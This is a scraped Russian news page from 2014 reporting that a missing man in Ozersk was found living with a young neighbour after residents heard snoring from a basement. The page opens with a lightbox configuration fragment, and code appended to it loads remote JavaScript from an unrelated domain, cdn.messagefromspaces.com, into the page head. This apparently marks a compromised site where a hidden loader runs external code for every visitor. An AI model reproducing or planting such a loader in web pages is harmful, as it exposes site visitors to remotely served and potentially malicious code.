, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

В Озерске без вести пропавшего мужчину нашли благодаря издаваемому им храпу

Курьезный случай произошел в Озерске. В отдел полиции обратилась местная жительница с заявлением о пропаже своего мужа. 8 марта он вышел на улицу, сказав, что отлучится на 5 минут, после чего пропал. Спустя несколько дней женщина забила тревогу и обратилась за помощью к стражам порядка. Проведя расследование, полицейские выяснили, что таинственное пропажа оказалась побегом.

Оказалось, что все это время мужчина жил у молодой соседки. Днем они пьянствовали, а на ночь он спускался спать в подвал. На след беглеца удалось выйти благодаря бдительным соседям. В ходе опросам они сообщили полицейским, что уже длительное время слышат храп, доносящийся из подвала одного из домов.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
14:51 - 27 марта 2014
|
автор: U-RSS
|
(791)
|
(0)

Комментарии (0)

Я человек
Я бот